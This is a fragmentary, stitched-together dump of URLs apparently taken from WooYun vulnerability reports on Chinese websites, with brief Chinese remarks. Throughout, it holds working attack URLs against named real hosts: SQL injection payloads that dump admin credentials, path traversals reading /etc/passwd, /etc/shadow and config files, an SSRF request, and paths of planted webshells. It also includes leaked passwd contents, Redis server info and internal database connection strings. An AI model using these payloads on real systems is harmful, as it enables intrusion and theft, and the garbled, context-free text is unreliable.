http://ufiles.91huayi.com/Put/test trs:templateservicefacade?wsdl存在writeFile和writeSpecFile方法,可导致getshell http://**.**.**.**/wcm/services/trs:templateservicefacade?wsdl http://**.**.**.**/main/CN/news.php?T=S&nk=DHJAYA9HN8MM&tk=FGWMN7BSFTAA http://**.**.**.**/main/CN/news.php?T=S&nk=DHJAYA9HN8MM&tk=FGWMN7BSFTAA http://bbs.dz.ztgame.com///uc_server/ http://bbs.dz.ztgame.com/uc_server//cs.php http://**.**.**.**/ejob/loginzphdwzpxx.do?dwloginid=%B0%B2%BB%D5%D6%D0%C5%A9%B8%BB%CD%A8%C5%A9%D2%B5%B9%E6%BB%AE%BF%C6%D1%A7%D1%D0%BE%BF%CB%F9%D3%D0%CF%DE%B9%AB%CB%BE http://**.**.**.**/ejob/loginzphdwzpxx.do?dwloginid=%B0%B2%BB%D5%D6%D0%C5%A9%B8%BB%CD%A8%C5%A9%D2%B5%B9%E6%BB%AE%BF%C6%D1%A7%D1%D0%BE%BF%CB%F9%D3%D0%CF%DE%B9%AB%CB%BE http://**.**.**.**/dede/login.php http://**.**.**.**/data/common.inc.php http://**.**.**.**/uploads/1.php http://zbgl.zjedu.gov.cn 
www.xhedu.net/sites/main/uploadfiles/2015/11/upfile425932.xls文件中包含账号,初始密码信息 http://**.**.**.** http://**.**.**.**/console http://**.**.**.**/wooyun/shell.jsp http://**.**.**.**/ http://**.**.**.**/customer/getCheckCode.action http://**.**.**.** http://biz.wepiao.com/index.php?r=/Public/login http://biz.wepiao.com/index.php?r=/Public/login http://oa.colourlife.com/ http://**.**.**.**/ http://zsb.cucn.edu.cn/news_more.asp?lm2=69 https://211.144.197.83/volvoworkbench/index.jsp http://**.**.**.**/Login/ForgetPassword进行密码重置,邮箱填一个自己的邮箱即可 http://**.**.**.**/en/e-services/do http://**.**.**.** http://www.zznissan.com.cn http://www.zznissan.com.cn/dongfengfengdu/buy/saveGetinfo.php www.zznissan.com.cn http://club.jinku.com http://**.**.**.**/awardsMsg.php?msgid=83 http://**.**.**.**/存在注入漏洞,mysql www.anhuifesco.com.cn www.fescoanhui.com.cn http://www.fescoadeccozhejiang.com/newss.asp?id=342 http://www.fescojs.com/HrDemands.asp?id=258 http://yun.admin5.com/teamapply/apply_sub data:company_address=59&company_name=59&company_url=20&email=05&mobile=65&name=09&qq=18 http://**.**.**.**/logon.do http://apiv2.vmovier.com/api/post/view?postid=47907 http://m.yaofang.cn/user/addAddress http://**.**.**.**:7001/defaultroot/login.jsp http://**.**.**.**:7001/defaultroot/public/select_user/search_org_list.jsp?searchName=1 http://**.**.**.**/service/rss/rss.asp?ChannelID=AvexRelease http://my.idcs.cn www.acunetix-referrer.com com:7001 http://regserver.aisino.com:7001 https://**.**.**.**/zmGitHub/73go/blob/1535abdd33dc484146e5408d496899182f968284/Application/UMessage/Conf/config.php http://cg.meteni.com/ http://**.**.**.**/Admin/Login.aspx http://www.licai18.com/bbsnew/List.jsp www.licai18.com http://**.**.**.**/pro_con.php?idept=1&pk=62&page=0&lang=zh http://**.**.**.**/ http://**.**.**.**/data/admin/ver.txt)的,存在DedeCms全局变量覆盖漏洞以及注入漏洞,直接爆管理员帐号密码: 
http://**.**.**.**/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@%60\%27%60%20/*!50000union*//*!50000select*/1,2,3,%28select%20CONCAT%280x7c,userid,0x7c,pwd%29+from+%60%23@__admin%60%20limit+0,1%29,5,6,7,8,9%23@%60\%27%60+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294 http://**.**.**.**/data/admin/ver.txt)。除了存在guestbook.php注入漏洞外,其同样存在DedeCms全局变量覆盖漏洞以及注入漏洞,直接爆管理员帐号密码: http://**.**.**.**/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@%60\%27%60%20/*!50000union*//*!50000select*/1,2,3,%28select%20CONCAT%280x7c,userid,0x7c,pwd%29+from+%60%23@__admin%60%20limit+0,1%29,5,6,7,8,9%23@%60\%27%60+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294 http://**.**.**.**/xampp/showcode.php/showcode.php?showcode=1 http://**.**.**.**:10080/jjksreg/123.rar http://wy.nenu.edu.cn/news/news.php?id=380 http://**.**.**.**/cb/QS_detail.asp?iAutoID=261 http://**.**.**.**/cb/QS_detail.asp?iAutoID=261 admin:admin target:http://**.**.**.**/CourseData.aspxy=103 http://wlxf.swu.edu.cn/plus/ajaxs.asp?action=GetRelativeItem&key=test http://wlxf.swu.edu.cn/plus/ajaxs.asp?action=GetRelativeItem&key=test%2525%2527%2529%2520%2575%256e%2569%256f%256e%2520%2573%2565%256c%2565%2563%2574%2520%2531%252c%2532%252c%2575%2573%2565%2572%256e%2561%256d%2565%252b%2527%257c%2527%252b%2570%2561%2573%2573%2577%256f%2572%2564%2520%2566%2572%256f%256d%2520%254b%2553%255f%2541%2564%256d%2569%256e%2500 http://**.**.**.**/newsinfo.php?id=4&nid=111 http://**.**.**.**/defaultroot/public/select_user/search_org_list.jsp?searchName=1 http://**.**.**.**/defaultroot/public/select_user/search_org_list.jsp?searchName=1 http://www.17ugo.com http://**.**.**.**/register/login.jsp http://**.**.**.**/register/portal/index!userImage.action http://**.**.**.**/register/upload/3d89f6e0-d345-4ac9-9f46-3af2273df62f.jsp http://game.db.766.com http://www.fzjty.com/ProList.html?key=N 
http://bzwsw.91huayi.com/Page/MainPage.aspx http://**.**.**.**/bugs/wooyun-2010-0136281 http://jf.ztgame.com http://www.onefoundation.cn/index.php?m=gaibian&a=show&id=724%20or%20updatexml%282,concat%280x7e,%28user%28%29%29%29,0%29%20or%27%27 http://www.onefoundation.cn/index.php?m=gaibian http://gzzz.91huayi.com www.rar http://mall.argylehotels.com http://zz.yixin.com/ www.vpluser http://sd.symc b.com/sd.crl0e https://d.s ymcb.com/cps0% http://**.**.**.**/ http://**.**.**.**:80/ http://**.**.**.** http://oa.colourlife.com http://insurance.noahwm.com/preSysApp/newSalesN/getCode.jsp?CodeType=bankcode http://**.**.**.**/admin/login.aspx http://**.**.**.**/ http://**.**.**.**/examsystem/ems/main/login.action存在 http://hainwx.huatu.com/reg/login.php https://aone.rajax.me redis_version:3.0.4 redis_git_sha1:00000000 redis_build_id:5b63f0e22b69e668 redis_mode:standalone os:Linux multiplexing_api:epoll gcc_version:4.4.7 process_id:7278 run_id:bdf5247648fae1c99903e9f331d9a6a8d986f1a2 tcp_port:6379 uptime_in_seconds:1574849 lru_clock:5275733 config_file:/usr/local/redis-3.0.4/conf/redis.conf used_memory:1438264 used_memory_human:1.37M used_memory_rss:7290880 used_memory_peak:433401320 used_memory_peak_human:413.32M used_memory_lua:36864 mem_fragmentation_ratio:5.07 mem_allocator:jemalloc-3.6.0 rdb_last_save_time:1448017092 total_commands_processed:6974311 total_net_input_bytes:3397872660 total_net_output_bytes:3192693929 instantaneous_input_kbps:0.03 instantaneous_output_kbps:0.00 latest_fork_usec:663 role:master repl_backlog_size:1048576 used_cpu_sys:461.21 used_cpu_user:314.08 used_cpu_sys_children:13.10 used_cpu_user_children:89.09 db0:keys=1,expires=0,avg_ttl=0 http://**.**.**.**/bugs/wooyun-2010-0141979别人提交清科集团 http://**.**.**.**/page/maint/common/UserResourceUpload.jsp?dir=/ height:20px;BORDER http://**.**.**.**/2.jsp http://**.**.**.**/bugs/wooyun-2015-0125117 http://**.**.**.**/sfs3/modules/docup/doc_download.php?docup_id=380 
http://**.**.**.**/sfs3/modules/docup/doc_download.php?docup_id=325 http://sohu.**.**.**.**/login/login.init.do?&elnScreen=1366*768elnScreen http://**.**.**.**/login/login.init.do?elnScreen=1366*768elnScreen http://**.**.**.**/person/searchjobs.php?id=1 http://www.wnwb.com/ http://map.qq.com/api/js?libraries= http://**.**.**.**/e/enews/index.php http://**.**.**.**/ http://xjxy.91huayi.com/index.aspx http://**.**.**.**/newsBefAction?doit=searchViewNo&location=1&no=476 http://**.**.**.**/newsBefAction?doit=searchViewNo&location=1&no=476 http://**.**.**.**:8000/ http://**.**.**.**/content/23905 http://**.**.**.**/Art_Show.php?id=26 http://**.**.**.**/Art_Show.php?id=26-2 http://**.**.**.**/Art_Show.php?id=26 http://**.**.**.**/psb?/V130Kvh82oDbLU/JamSNody0Alx8XCzvEa0xkPdv6mO6LJEoa1KttyGRLE!/o/dGUBAAAAAAAA&ek=1&kp=1&pt=0&bo=1QOAAkAExgIFAPc!&su=1135373457&sce=0-12-12&rf=2-9 http://**.**.**.**/Art_Show.php?id=26 http://**.**.**.**/Art_Show.php?id=26 http://**.**.**.** http://221.234.42.160:8080/ http://**.**.**.**/NewsScrollList.aspx?RegionId=B0&CataId=51001&DateFlag=On&TitleWords=16 http://**.**.**.**/feed.aspx?ID=191 http://**.**.**.**/department/ltx/artical_view.asp?ID=505 http://**.**.**.** root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin lighttpd:x:100:101:lighttpd server:/var/www/lighttpd:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin 
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash pcap:x:77:77::/var/arpwatch:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin exim:x:93:93::/var/spool/exim:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin puppet:x:52:52:Puppet:/var/lib/puppet:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin admin:x:0:0:admin:/home/admin:/bin/clish zabbix:x:2000:2000::/home/zabbix:/sbin/nologin http://data.cn.made-in-china.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/root/.bash_history http://data.cn.made-in-china.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/shadow http://huodong.kuwo.cn/huodong/st/ActCommentsNewFromDB?dis=/WEB-INF/web.xml&pn=0&subid=142 http://huodong.kuwo.cn/huodong/st/ActCommentsNewFromDB?dis=/WEB-INF/func_yy.tld&pn=0&subid=142 http://**.**.**.**/ http://**.**.**.**/展示 http://**.**.**.**/ http://ad.**.**.**.**/myadmin/phpmyadmin/index.php http://**.**.**.**/air.php?pk=1&lang=zh http://**.**.**.** http://**.**.**.**/pingajs/login.index http://**.**.**.**/pingajs/pinga?fid=A1 http://kdhr.kingdee.com:6688/admin http://kids.chineseall.cn/index.php/index/channel/sort/%E4%BD%93%E8%82%B2%E7%9B%8A%E6%99%BA*/letter/e http://aq.sj.91.com/bd/syncpass.ashx?bdu=QkJV......QkpDUUFBQ...UFBRUFBQUQ.....UFBQUFBQ......EZGV1F6&t=1448172689091 http://qd.10jqka.com.cn/api.php?info=vm_sz_1a0001 http://www.minanins.com:9090/ http://fagui.eol.cn/attach.php?aid=33 http://bssfj.czbanbantong.com/login.action https://mail.midea.com http://dmma.hit.edu.cn/ http://cw.crcgas.com/index.asp http://cw.crcgas.com/cw1_input.asp http://cw.crcgas.com/cw1_up.asp http://**.**.**.**/newweb/seis/seis_cmt.jsp?event_id=20051008_0350395&contributor=USGS&mode=cmt http://act.midea.com/jdprize/site/CI3/index.php/admin/C_login 
http://hr.hc360.com/hr/turbine/template/HrLogin.html用户名密码明文传输,无验证码限制 http://**.**.**.**:8080/mbapp/ http://**.**.**.**:8080/mbapp/shell.jsp http://www.ucml.com.cn/ http://182.92.82.245:8086/filegallery.aspx http://yy.globevisa.cn/filegallery.aspx http://oa.ucml.com.cn/filegallery.aspx http://sales.xcar.com.cn/ http://www.lanmeishuo.com/ www.ikongjian.com http://182.92.113.235/seeyon/main.do http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/home/user/forgetPasswd?url=http%3A%2F%2F**.**.**.**%2F http://**.**.**.**/admin.php http://app.cmiea.org http://**.**.**.**//ewebeditor/admin_login.asp?action=out http://fzfzxy.swu.edu.cn/fzfz/doc.php?wid=8915&lid=162 http://**.**.**.**/)另一个参数SQL注入 http://**.**.**.** http://**.**.**.**/bd_nry.php?id=873 http://**.**.**.**/news_show.php?id=22 http://**.**.**.**/bugs/wooyun-2010-0143184 http://**.**.**.**/view/company.php?qState=af42a38e989e3971ce458000f682fa47&func=search&catalog=0401&cityCode=2* http://tcpe.upc.edu.cn//siteserver/service/background_taskLog.aspx?Keyword=test%'%20and%20@@version=1%20and%202='1&DateFrom=&DateTo=&IsSuccess=All http://tcpe.upc.edu.cn/siteserver/service/background_taskLog.aspx?Keyword=test%%27%20and%20@@version=1%20and%202=%271&DateFrom=&DateTo=&IsSuccess=All http://tcpe.upc.edu.cn//usercenter/platform/user.aspx?UnLock=sdfe%27&UserNameCollection=test%27%29%20and%20@@version=2;%20-- www.haodai.com www.haodai.com https://**.**.**.**/Products.php?autono=43 http://www.iconedu.co.uk/school.php?id=3 http://**.**.**.** http://**.**.**.**/homepage/LoginHomepage.jsp?hpid=1 http://oa.baihe.com:3220/jsoa/ http://**.**.**.**/news_details.php?pkey=43 http://**.**.**.**/download.php?newsletter_cat=&newsletter_month=all&newsletter_year=all&pg=1&search= http://house.mama.cn http://**.**.**.**/search.php?keyword=ZREq http://**.**.**.**/search.php?keyword=ZREq http://**.**.**.**/womenCare/newsBefAction?doi http://**.**.**.**/womenCare/newsBefAction?doi http://**.**.**.**/newreg_english/NewSelDatenk.asp 
http://**.**.**.**/dept/hc/1.asp?p_sn=108 http://**.**.**.**/newdesign/comptaipei/chinalawvi http://**.**.**.**/newdesign/comptaipei/chinalawvi http://**.**.**.**/news_detail.php?sid=1&fid=225&id=909&h=2 http://jipiao.fuiou.com/queryTicketesShow.action http://testuser.haier.com/ids/cn/haier_login.jsp?regFrom=WishDiyProj&returnUrl=http%3A%2F%2Fmakerekam.com%2Fcallback%3Fr%3Dhttp%3A%2F%2Fmakerekam.com http://**.**.**.**/booklist.php?cPath=24&cate_id=64 http://**.**.**.**/booklist.php?cPath=24&cate_id=64 http://www.ppm.cn/ www.ppm.cn http://**.**.**.**/admin http://www.cs2sc.com/showcom.php?id=54 http://**.**.**.**/tabid/2038/ctl/ViewOrganization/mid/7730*/ItemID/437022/Default.aspx?ctlmode=none http://**.**.**.**/tabid/2038/ctl/ViewOrganization/mid/7730*/ItemID/437022/Default.aspx?ctlmode=none http://www.xywy.com/about/admin.php http://www.xywy.com/about/include/config.inc.php http://www.ezxdf.cn/index.php?a=arcdetail&aid=559&m=article http://interface2.0.ibananas.cn/api/user/addattention.json http://**.**.**.**/UserLogin.aspx,如图: http://**.**.**.** https://**.**.**.**/pur_portal/download.jsp?filename=../../../../../../../../../../../../../../../etc/passwd lp:/bin/false invscout:/usr/bin/ksh user:/usr/sbin/snapp:/usr/sbin/snappd user:/var/spool/uucppublic:/usr/sbin/uucp/uucico ipsec:/usr/bin/ksh esa:/usr/bin/ksh weblogic:/usr/bin/ksh empty:/usr/bin/ksh http://**.**.**.**/ http://**.**.**.**/bugs/wooyun-2010-078915 http://**.**.**.** http://oa.998.com/login/Login.jsp?logintype=1 http://oa.998.com//pweb/careerapply/HrmCareerApplyPerEdit.jsp?id=1 http://**.**.**.**/index.php/regist https://source.jinyinmao.com.cn/api/banner_jsonp.php?id=13&jsonp= http://testm.10jqka.com.cn/phpmyadmin http://**.**.**.**:8080/login/Login.jsp?logintype=1 http://**.**.**.**/null上传的文件名.jsp http://**.**.**.**/tools/SWFUpload/upload.jsp height:20px;BORDER 
http://**.**.**.**/System/ZoneSelect.asp?AreaCode=1&CountryCode=&time=2015%E5%B9%B411%E6%9C%8822%E6%97%A5%20GMT%208%E4%B8%8B%E5%8D%889:03:24&ZoneCode= http://www.izhenxin.com/usercp/info_save/?status=0&uid=481721110&type=1&state%5Bstatus%5D=0&state%5Bfid%5D= www.izhenxin.com http://**.**.**.**/p-8476065969329.html http://**.**.**.**/开刀,发现存在多个Struts2命令执行漏洞,且为root权限: http://**.**.**.**/login.shtml http://**.**.**.**/login/login.shtml http://**.**.**.**:8082/login.shtml http://club.haier.com/haier.tar.gz http://contact.haier.com/haier.tar.gz http://kr.haier.com/haier.rar http://survey.haier.com/haier.tar.gz http://eq.10jqka.com.cn/suggestion_forclient_index.php?op=getfeedback&for=ths_am_gphone_login&username=123456 http://**.**.**.**/coremail/index.jsp http://**.**.**.**/bugs/wooyun-2015-0151719 http://**.**.**.**/eservice/user/customer.do?action=home&username=weaver http://act.midea.com/jdprize/site/phpMyAdmin40 http://www.1218.com.cn/index.php/product?id=23 http://www.1218.com.cn/index.php/company/recruitment?location=&type=43&position= http://www.1218.com.cn/index.php/company/recruitment?location=深圳&type=&position= http://www.1218.com.cn/index.php/company/recruitment?location=深圳 http://www.1218.com.cn/index.php/company/recruitment?type=&position= http://www.1218.com.cn/index.php/company/recruitment?location=&position= http://www.1218.com.cn/index.php/company/recruitment?location=北京&type=&position= http://www.1218.com.cn/index.php/company/recruitment?location=深圳 http://**.**.**.**/elitist/elitist_show.php?Elististsubcat_ID=12存在sql注入漏洞。 http://202.104.30.95:8080/web/rdlogin.jsp http://202.104.30.95:8080/web/ http://**.**.**.** http://**.**.**.** http://www.zte-v.com.cn/Plus/SubForm.aspx?FID=2&NodeID=35 http://www.zte-v.com.cn/Plus/SubForm.aspx?FID=2&NodeID=35%20and%201=@@version index.php/qas/index?keyword=test http://**.**.**.**/News/NewsShow.aspx?NewsId=100034 http://**.**.**.**/News/NewsShow.aspx?NewsId=100034 http://library.upc.edu.cn 
http://yw.shenhuayx.com/shenhua_web/login.jspx http://yw.shenhuayx.com/shell/app2.jsp URL:http://**.**.**.**/faq.php?id=1 http://**.**.**.**/dbadmin/news_edit.php http://**.**.**.**/news/shell.php http://**.**.**.**:7001/menu/index.jsp http://**.**.**.**:7001/menu/index.jsp http://**.**.**.**:7001/UserInfoConfirmServlet http://**.**.**.**:7001/menu/index.jsp http://**.**.**.**/ReadDocument.asp?ID=8696 http://www.xnslfh.gov.cn/swweb/search.asp?ModuleName=%EF%BF%BD%EF%BF%BD%D5%BE%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD https://vpn.zznissan.com.cn/por/login_psw.csp?rnd=0.046091236710741446 http://**.**.**.**/ http://**.**.**.**/a/security/bugs/script/2013/0201/12354.html http://oa.t3.com.cn/ http://oa.t3.com.cn/pweb/careerapply/HrmCareerApplyPerEdit.jsp?id=1 http://learning.yonyou.com/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin http://uso.changhong.com/USOControlPanel# http://cen.bnu.edu.cn/ http://cen.bnu.edu.cn http://**.**.**.**/i-trade/ http://**.**.**.**/app/server.jsp http://online.zhihuishu.com/onlineSchool/bbs/studentDiscussionDetail/1786491?bbsGroupId=22164&recruitId=1249&courseId=2000581&groupInto=0 http://tc.changhong.com:80/ http://**.**.**.**/fetchPsw/fetchPswByMobile.ac http://cam.tju.edu.cn/en/achiv/index.php?id1=10&y=11 http://m.haier.com/ids/mobile/login.jsp此处登录位置没有验证码,用户名密码明文传输 http://oa.superjia.com/ http://oa.superjia.com/js/extjs//examples/feed-viewer/feed-proxy.php?feed=http/../../../../../../../../../../../root/.bash_history http://oa.superjia.com/js/extjs//examples/feed-viewer/feed-proxy.php?feed=http/../../../../../../../../../../../oa/weaver/ecology/WEB-INF/prop/weaver.properties http://gis.upc.edu.cn/ http://gis.upc.edu.cn http://**.**.**.**/NewsContent.aspx?NewsId=591&ClassID=99&ServiceTypeId=1&ParentId=97 http://**.**.**.**/admin/ http://**.**.**.**/bugs/wooyun-2015-0153525 inurl:EpointBigFileUpload http://radio.upc.edu.cn/ 
http://radio.upc.edu.cn radio.upc.edu.cn/contents/21/140.html%22%3A%22266%7C1447852626189%22%7D http://zjdj.wasu.cn http://zjdj.wasu.cn//course/home/CountCourseList?orderType=NewFirst&cityCode=0&countyCode=0&townCode=0&courseCategory=461a352d-6f58-459f-9909-7bd32ceb7f6e&courseNam= http://**.**.**.**/Website/newsshow.jsp?id=128 http://child.bnu.edu.cn/ http://child.bnu.edu.cn http://**.**.**.**/ http://**.**.**.**/ http://116.236.239.100 http://**.**.**.**/gxsme/toproductlist.action http://**.**.**.**/N10Web/login.action http://**.**.**.**/N10Web/shell.jsp http://yey.bnu.edu.cn/ http://yey.bnu.edu.cn com:9168 http://**.**.**.** http://***.***.***.***/qygk/ml_lbnr.aspx?id=7775 http://***.***.***.***/default/GzdtListShow.aspx?id=288 http://***.***.***.***/Zxjj/ZrxxListShow.aspx?id=4383 http://***.***.***.***/default/GzdtListShow.aspx?id=288 http://sj.baidu.com/actionresult/96225010 http://**.**.**.**/phpmyadmin/index.php?lang=zh&server=1 http://**.**.**.**/admin/admin_login.php http://113.106.74.151:8081/ http://113.106.74.151:8081//uddiexplorer/SearchPublicRegistries.jsp?operator=http://192.168.247.211:8081&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Businesslocation&btnSubmit=Search http://**.**.**.** http://hqbzc.upc.edu.cn/ http://hqbzc.upc.edu.cn http://**.**.**.**/Login.aspx http://mpos.unionpay.so:8383/manager/system/noticeContent.aspx?action=view&id=13&target=mpos http://cp.conqueror.cn http://p.biketo.com/ajax/brandBikes?brand_id=85&cate_id=1&page=1&pageSize=12 http://123.57.45.192:8080/thermometer/user/forgetPassword http://123.57.45.192:8080/thermometer/user/userLogin http://123.57.45.192:8080/thermometer/user/loginByEmail http://123.57.45.192:8080/thermometer/user/updateHeadImage http://bbs.buynow.com.cn/uc_server/ http://erp.tup.tsinghua.edu.cn/service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.release.InfoReleaseAction&method=createBBSRelease&TreeSelectedID=&TableSelectedID= 
http://proxy.tup.tsinghua.edu.cn/service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.release.InfoReleaseAction&method=createBBSRelease&TreeSelectedID=&TableSelectedID= http://proxy.tup.tsinghua.edu.cn/service/~iufo/com.ufida.web.action.ActionServlet?RefTargetId=m_strUnitCode&onlyTwo=false¶m_orgpk=level_code&retType=unit_code&Operation=Search&action=nc.ui.iufo.web.reference.base.UnitTableRefAction&method=execute http://wap.wochacha.com http://**.**.**.**/index.php?m=formguide&c=index&a=show&formid=12&dataid=26 http://**.**.**.**:8082/ http://**.**.**.**:8082 http://eel.xmu.edu.cn/resources/articles/ https://open.weixin.qq.com/connect/oauth2/authorize?appid=wx3827070276e49e30&redirect_uri=http://wx.17u.cn/train/trainquery.html?showwxpaytitle=2&response_type=code&scope=snsapi_base&state=123#wechat_redirect http://wx.17u.cn/train/TrainOrderDetail.html?orderId=Ya3vWuZreT3p0TWFGIBCig%3D%3D&bookerId=wa8q4T8svhf1R2CqZadpug%3D%3D http://dq.zhulong.com/mobile/datum?keywords=-1 http://oa.hupu.com:88/seeyon/ http://180.153.223.220/seeyon/ http://wcmc.csu.edu.cn:8080/xiaodao/9999.jsp http://wcmc.csu.edu.cn:8080/zlpg20151112/bbsDeal!getExcExperienceBBSContent.action http://euro2012.touzhu.cn/Desc/zhuanbo中参数zhuanbo存在sql注入,爆出db跟system_user http://10jqka.com.cn/modules.php?name=Surveys&op=results&vid=1034 http://10jqka.com.cn/modules.php?name=Surveys&op=results&vid=1034/**/and/**/1 http://10jqka.com.cn/modules.php?name=Surveys&op=results&vid=1034/**/and/**/0 http://**.**.**.**/sso/notice?id=aeed1f98-8813-11e5-8bdf-558e5d3bf96d http://211.151.86.221:8898 http://**.**.**.**/w280700/w00/index.action http://**.**.**.**/w280700/bak.jsp http://123.103.10.28:7070/zentaopms/ http://123.103.10.28:7070/zentaopms/www/index.php?m=my&f=index http://**.**.**.**/bugs/wooyun-2015-0102608 http://**.**.**.**/papers/10467 http://ht.zhulong.com/mobile/vipinfo?keywords=-1 http://admin.cbnweek.com/ http://kq.qycn.com/personnel/leave/download/?filename=a.php&file=../ThinkPHP/thinkphp.php 
http://kq.qycn.com/personnel/leave/download/?filename=a.php&file=../ThinkPHP/ThinkPHP.php user:admin http://acm.bnu.edu.cn http://urp.tongji.edu.cn/getBackPasswordByQuestion.portal http://www.aoshitang.com/login.action这个地方一开始没有验证码: http://mall.argylehotels.com http://pub2.whut.edu.cn/autodsh/shownews.asp?id=938&type=%B6%AD%CA%C2%BB%E1%B6%AF%CC%AC http://**.**.**.**/web_tw/news_detail.php?n=news&appId=&id=2013 http://**.**.**.**/admin/ct/.txt http://**.**.**.**/kat/admin/ct/action/shell.php http://www.sinoflt.com/swpx/indexExpert_getExpertInfo.action?expert.id=724 http://mba.upc.edu.cn http://s-170401.gotocdn.com/back_comment_num.php,在浏览器中打开发现如下提示: http://www.muzhiwan.com/about/feedback.html http://**.**.**.** http://**.**.**.**/myads/login.asp https://**.**.**.**/news1-1-1.asp?id=1441 https://**.**.**.**/news1-1-1.asp?id=1441 http://**.**.**.** http://0easy.com/ http://0easy.com/templet_pro.do?siteid=8677e0af-986b-43c5-9f06-017580d57d21&currChannelid=cbf04958-10b8-440f-9a37-5b2c62afff87&templetPath=..%2F..%2FWEB-INF%2Fweb.xml&jobid=235aa94c-8d4c-40c8-94e9-7e7fb8a20567 http://msi.sicnu.edu.cn/ http://msi.sicnu.edu.cn http://www.mycaijing.com/detail/223645.html http://www.duba.net/e/admin/admin.php www.duba.net/e/config/config.php https://github.com/tchqiq/MailReporting/blob/a38a24aa66c297d3cb90adf94cfac5908715a046/mail_test.py http://open.muzhiwan.com/?action=public&opt=login open.muzhiwan.com/?action=public&opt=check_username http://newswire.yicai.com http://cnar.wh.sdu.edu.cn/ http://cnar.wh.sdu.edu.cn/news.asp?newsid=137&daohang=%D7%EE%D0%C2%B6%AF%CC%AC http://simple.minanins.com:8021/console/login/LoginForm.jsp http://simple.minanins.com:8021/ca/ma3.jsp?o=vLogin http://cw.crcgas.com/ http://cw.crcgas.com/up.asp http://cim.chinamacro.com/RNBSS/user_login.do http://cim.chinamacro.com/RNBSS/conn.jsp http://cim.chinamacro.com/RNBSS/cmd.jsp jdbc:sqlserver://192.168.0.21:1433;DatabaseName=条码系统_热能 jdbc:oracle:thin:@192.168.0.39:1521:ebs 
jdbc:oracle:thin:@192.168.0.17:1521:pdm https://github.com/ywww/xunlei/blob/da20c9d24e458fb1d8937d652eb93025a4df4ac1/mail/src/main/resources/mail.properties http://learning.ufh.com.cn http://114.215.101.86:8080/login.do http://psych.tju.edu.cn/joins.php?user=-1 inurl:php http://**.**.**.**/index-info.php?id=340&category=17 http://mzw.anquanxia.com/?action=member&opt=showuser&uid=1605209 http://www.***.com/ http://www.infzm.com/mobile/get_list_by_cat_ids?cat_id%5B%5D=4769&start=0&count=11&platform=ireader&device=Unknown%20iOS%20device&version=4.0.0&system_version=7.0&hash=5f856a3b83efd83a8e0e7d1b382bcc50&format=json www.daidekuai.com/hdaidetail.php?id=241 http://mse.tju.edu.cn/ajt/download.php?id=3&type=attach http://liantong.cheyipai.com/PContrller/Login/forget_password_step1 http://school.10jqka.com.cn/question.php?op=new&vid=11111 http://www.0easy.com/contactus_save.do https://github.com/kinglion/tttuangou/blob/ba6b53612c949fa7437778b8ced80c5609f7e23f/dbfenxbackup.php http://**.**.**.**/templates/zt/gobyscv/citydetail.php?cityid=103018 http://**.**.**.**/index.php http://kq.qycn.com/ http://kq.qycn.com/personnel/leave/leaveDetails/dtype/1/lid/244114 https://github.com/tchqiq/MailReporting/blob/a38a24aa66c297d3cb90adf94cfac5908715a046/mail_test.py http://passport.oa.com/modules/passport/signin.ashx?url=http://****** http://10.130.0.78/ http://intime.com.cn:80/intime/front/stores/ http://intime.com.cn http://ahyt.intime.com.cn http://ws.intime.com.cn http://vip.intime.com.cn http://mail.intime.com.cn http://www.intime.com.cn/ http://**.**.**.**/activity/event_news_detail.php?event_id=4&topage=&qry_str= http://**.**.**.**/admin/login.php http://**.**.**.**/superadmin/ http://**.**.**.**/CTManager/login.do?lel=0&code=nahalacfpagoapogggjjcilcpobmpnib http://**.**.**.**/CTManager/upload/images/20151123_181202788.jsp http://s.biketo.com/ajax/fansList?num=54?timestamp=1447904911977&shop_id=1769&start=0 http://**.**.**.**:8085/counter/readcount.asp?userid=dangsn 
